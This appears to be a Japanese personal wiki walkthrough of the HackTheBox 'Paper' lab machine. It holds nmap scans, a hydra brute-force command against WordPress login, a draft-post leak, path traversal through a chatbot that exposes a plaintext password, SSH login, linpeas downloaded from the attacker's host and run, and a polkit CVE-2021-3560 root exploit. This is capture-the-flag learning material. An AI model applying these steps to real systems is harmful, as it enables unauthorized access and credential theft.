HTB_Paper - meruneru/tech_memo GitHub Wiki
Step0:
ターゲットドメインの確定->paper.htb
Step1:
サブドメインの列挙 -> office.paper, chat.office.paper Step2:
エンドポイントの抽出
Step3:
パラメータの抽出
Step4:
スキャンの開始
#ssh, #http, #https の3サービス
┌──(kali㉿kali)-[~/share/ctf/htb/paper] [11/160]
└─$ nmap -sV -sC -Pn paper.htb -oN nmap.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-20 09:03 EDT
Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
┌──(kali㉿kali)-[~/htb/Crocodile]
└─$ gobuster dir -u paper.htb -w ~/wordlist/common.txt
/manual
X-Backend-Serverにoffice.paperというドメインがあることがわかった。
!Pasted image 20220521131022.png
/etc/hostsに office.paperを追加した。
!Pasted image 20220521132633.png
ちなみに、wfuzzでやってみたが、特に見つからず。
$ sudo wfuzz -w subdomains-top1million-110000.txt -c -f wfuzz-output.txt -u "paper.htb" -H "HOST:FUZZ.paper.htb" --hc 301 1
office.paperに対してポートスキャンを行うと WordPress 5.2.3が動いている
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ nmap -sV -sC -Pn office.paper -oN nmap2.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-21 02:13 EDT
Nmap scan report for office.paper (10.10.11.143)
Host is up (0.20s latency).
rDNS record for 10.10.11.143: paper.htb
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: WordPress 5.2.3
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: Blunder Tiffin Inc. – The best paper company in the elec...
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
1066/tcp filtered fpo-fns
1145/tcp filtered x9-icue
3945/tcp filtered emcads
4001/tcp filtered newoak
5051/tcp filtered ida-agent
10082/tcp filtered amandaidx
10566/tcp filtered unknown
20222/tcp filtered ipulse-ics
http://paper.htb/manual Apacheのドキュメントページ。 Apache ver.2.4
http://office.paper/ ブログページにつながった
http://office.paper/wp-login.php 最下段にログインできるリンクあり。 ワードプレスの模様。
#hydra でパスワードを総当りしてみるも、時間がかかりすぎるので断念。
hydra -l prisonmike -L ~/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt office.paper http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Foffice.paper%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V
wordpressの脆弱性を突いてみる。
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ searchsploit Wordpress 5.2.3
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
WordPress Core 5.2.3 - Cross-Site Host Modification | php/webapps/47361.pl
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
/usr/share/exploitdb/exploits/multiple/webapps/47690.mdの説明を見る。
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md 126 ⨯ 2 ⚙
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
Here are a few ways to manipulate the returned entries:
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
下記にアクセスすることで、下書き状態の記事にアクセスできる。 http://office.paper/?static=1&order=desc
下書きの中に下記でアカウントを作れるみたい。 http://chat.office.paper/register/8qozr226AhkCHZdyY
/etc/hostsにchat.office.paperを追加する。
rocket chatにつながる http://chat.office.paper/home
botに話しかけて、SSHログインするための情報を収集していくはず・・・。
ID:dwight
recyclops list ../ recyclops list ../.ssh recyclops list ../hubot recyclops file ../hubot/.env <!=====Contents of file ../hubot/.env=====> export ROCKETCHAT_URL='http://127.0.0.1:48320' export ROCKETCHAT_USER=recyclops export ROCKETCHAT_PASSWORD=Queenofblad3s!23 export ROCKETCHAT_USESSL=false export RESPOND_TO_DM=true export RESPOND_TO_EDITED=true export PORT=8000 export BIND_ADDRESS=127.0.0.1 <!=====End of file ../hubot/.env=====>
rocket chatにrecyclops/Queenofblad3s!23でログインするも拒絶される。
!Pasted image 20220521171719.png
$ ssh [email protected]
PW: Queenofblad3s!23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ cat /etc/passwd
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
unbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
clevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:x:983:981:User for sssd:/:/sbin/nologin
colord:x:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:x:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash
権限昇格のための情報を収集する #LinPEAS github を実行する。
strapiサーバにはDNSがないので、kaliローカルに置いたファイルをwgetしてもっていく。
kali $ wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/linpeas.sh
kali $ python3 -m http.server 8000
strapi@horizontall:/tmp$ wget http://10.10.14.3:8000/linpeas.sh
strapi@horizontall:/tmp$ chmod +x linpeas.sh
strapi@horizontall:/tmp$ ./linpeas.sh
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.29
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin
New path exported: /home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:
/sbin:/bin
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
@reboot /home/dwight/bot_restart.sh >> /home/dwight/hubot/.hubot.log 2>&1
incrontab Not Found
-rw-r--r--. 1 root root 0 Nov 8 2019 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jan 12 2021 /etc/crontab
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation 上記脆弱性が使えそうだが、上記Githubのスクリプトではうまくできなかった。 seachsploit内にあるスクリプトでうまくできた。
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ searchsploit polkit
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege | linux/local/47167.sh
Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit) | linux/local/47543.rb
PolicyKit polkit-1 < 0.101 - Local Privilege Escalation | linux/local/17932.c
polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork | linux/dos/46105.c
Polkit 0.105-26 0.117-2 - Local Privilege Escalation | linux/local/50011.sh
systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active S | linux/dos/46743.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ searchsploit -m 50011.sh
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ nkf -w -Lu --overwrite 50011.sh
50011.shをvictim側に送信して、スクリプトを実行すると hacked/passwordというアカウントが作られ、指示どおりにコマンド打つとrootが取れた。